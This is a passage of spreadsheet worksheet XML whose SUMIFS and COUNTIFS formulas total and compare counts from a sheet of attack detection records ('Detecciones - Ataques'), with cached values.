      <c r="DI51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5549</v>
      </c>
      <c r="DJ51" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>18</v>
      </c>
      <c r="DK51" s="271"/>
      <c r="DO51" s="279"/>
      <c r="DP51" s="271"/>
      <c r="DQ51" s="271"/>
      <c r="DR51" s="271"/>
      <c r="DS51" s="271"/>
      <c r="DT51" s="271"/>
      <c r="DU51" s="271"/>
      <c r="DV51" s="271"/>
      <c r="DW51" s="271"/>
      <c r="DX51" s="271"/>
      <c r="DY51" s="271"/>
      <c r="DZ51" s="271"/>
      <c r="EA51" s="271"/>
      <c r="EB51" s="271"/>
      <c r="EC51" s="271"/>
      <c r="ED51" s="280"/>
      <c r="EG51" s="279"/>
      <c r="EH51" s="271"/>
      <c r="EI51" s="358" t="s">
        <v>951</v>
      </c>
      <c r="EJ51" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S29 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK51" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S29 &amp; "*")</f>
        <v>17</v>
      </c>
      <c r="EL51" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S29 &amp; "*")</f>
        <v>25</v>
      </c>
      <c r="EM51" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S29 &amp; "*")</f>
        <v>34</v>
      </c>
      <c r="EN51" s="360">
        <f t="shared" si="37"/>
        <v>34</v>
      </c>
      <c r="EO51" s="364"/>
      <c r="EP51" s="456">
        <f t="shared" ref="EP51:EP62" si="40">EN51/EN30</f>
        <v>0.3617021277</v>
      </c>
      <c r="EQ51" s="457">
        <f t="shared" ref="EQ51:EQ62" si="41">1-EP51</f>
        <v>0.6382978723</v>
      </c>
      <c r="ER51" s="427">
        <f t="shared" ref="ER51:ER62" si="42">1-(EL51/EL30)</f>
        <v>0.4791666667</v>
      </c>
      <c r="ES51" s="427">
        <f t="shared" ref="ES51:ES62" si="43">1-(EK51/EK30)</f>
        <v>0.4516129032</v>
      </c>
      <c r="ET51" s="427">
        <f t="shared" ref="ET51:ET52" si="44">1-(EJ51/EJ30)</f>
        <v>0.875</v>
      </c>
      <c r="EU51" s="271"/>
      <c r="EV51" s="358" t="s">
        <v>2013</v>
      </c>
      <c r="EW51" s="463" t="str">
        <f t="shared" ref="EW51:EZ51" si="39">IF(EJ29=0,"-",EJ50/EJ29)</f>
        <v>-</v>
      </c>
      <c r="EX51" s="463" t="str">
        <f t="shared" si="39"/>
        <v>-</v>
      </c>
      <c r="EY51" s="463" t="str">
        <f t="shared" si="39"/>
        <v>-</v>
      </c>
      <c r="EZ51" s="464" t="str">
        <f t="shared" si="39"/>
        <v>-</v>
      </c>
      <c r="FA51" s="280"/>
      <c r="FK51" s="445"/>
      <c r="FL51" s="359"/>
      <c r="FM51" s="359"/>
      <c r="FN51" s="359"/>
      <c r="FO51" s="359"/>
      <c r="FP51" s="359"/>
      <c r="FY51" s="379" t="s">
        <v>633</v>
      </c>
      <c r="FZ51" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA51" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC51" s="379" t="s">
        <v>633</v>
      </c>
      <c r="GD51" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0.4545454545</v>
      </c>
      <c r="GE51" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY51 &amp; "*"))</f>
        <v>0.5</v>
      </c>
    </row>
    <row r="52">
      <c r="B52" s="277"/>
      <c r="C52" s="271"/>
      <c r="D52" s="271"/>
      <c r="E52" s="271"/>
      <c r="F52" s="271"/>
      <c r="G52" s="278"/>
      <c r="J52" s="277"/>
      <c r="K52" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BJ3:BJ139)</f>
        <v>7946</v>
      </c>
      <c r="L52" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CX3:CX139)</f>
        <v>174053</v>
      </c>
      <c r="M52" s="353">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EN3:EN139)</f>
        <v>228821</v>
      </c>
      <c r="N52" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GD3:GD139)</f>
        <v>388077</v>
      </c>
      <c r="O52" s="278"/>
      <c r="Q52" s="271"/>
      <c r="R52" s="352" t="s">
        <v>2511</v>
      </c>
      <c r="S52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="T52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="V52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="W52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Z52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>566</v>
      </c>
      <c r="AA52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AB52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AC52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AD52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AE52" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AF52" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AG52" s="271"/>
      <c r="AH52" s="352" t="s">
        <v>2511</v>
      </c>
      <c r="AI52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>0</v>
      </c>
      <c r="AJ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>1</v>
      </c>
      <c r="AR52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>0</v>
      </c>
      <c r="AS52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>0</v>
      </c>
      <c r="AV52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>0</v>
      </c>
      <c r="AY52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>0</v>
      </c>
      <c r="BD52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>566</v>
      </c>
      <c r="BN52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>0</v>
      </c>
      <c r="BO52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG52" s="355">
